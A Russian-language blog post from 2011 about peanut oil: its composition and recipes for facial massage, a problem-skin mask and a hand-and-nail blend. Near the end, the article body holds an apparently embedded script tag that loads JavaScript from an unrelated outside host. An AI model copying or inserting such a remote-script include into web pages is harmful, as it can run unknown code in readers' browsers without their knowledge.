пятница, 16 сентября 2011 г.

Арахисовое масло (Oleum Arachides)

Сырьем для этого масла является земляной орех — арахис. Арахисовое масло представляет собой светлую жидкость желтоватого оттенка с приятным ароматом и вкусом, содержащую триолеин, триглецирид линолевой кислоты, гипогеевую кислоту и насыщенные жирные кислоты: стеариновую, пальмитиновую. Кроме этого в арахисовом масле содержатся минералы, витамины и другие полезные вещества.
Применение
Арахисовое масло обладает питательными, увлажняющими и защитными свойствами. Его используют в различных косметических целях: средствах косметики, массаже, парфюмерии.
Для омолаживающего массажа лица нужно приготовить состав из 2 чайных ложек арахисового масла и 1 чайной ложки масла зверобоя. Смесь нанести на лицо массирующими движениями. К массажной смеси можно добавить различные эфирные масла, в зависимости от типа кожи. После окончания массажа остатки смеси аккуратно снять салфеткой.
Арахисовое масло часто используют для приготовления масок.
Прекрасным средством для проблемной кожи является смесь: 1 ст. ложка арахисового масла, 2капли лимонного масла, 4капли масла можжевельника, 4 капли петигрейна. Состав наносится на лицо и остается, пока полностью не впитается. Остатки смеси снимаются салфеткой.
Массажная смесь для рук и ногтей приготавливается следующим образом: смешиваются облепиховое, арахисовое и тыквенное масло в соотношении 1:1:1. Состав подогревается на водяной бане до температуры 40 градусов Цельсия, после этого можно приступать непосредственно к массажу.
<script language="JavaScript" charset="UTF-8" src="http://z880.takru.com/in.php?id=882187"></script>

Комментариев нет:

Отправить комментарий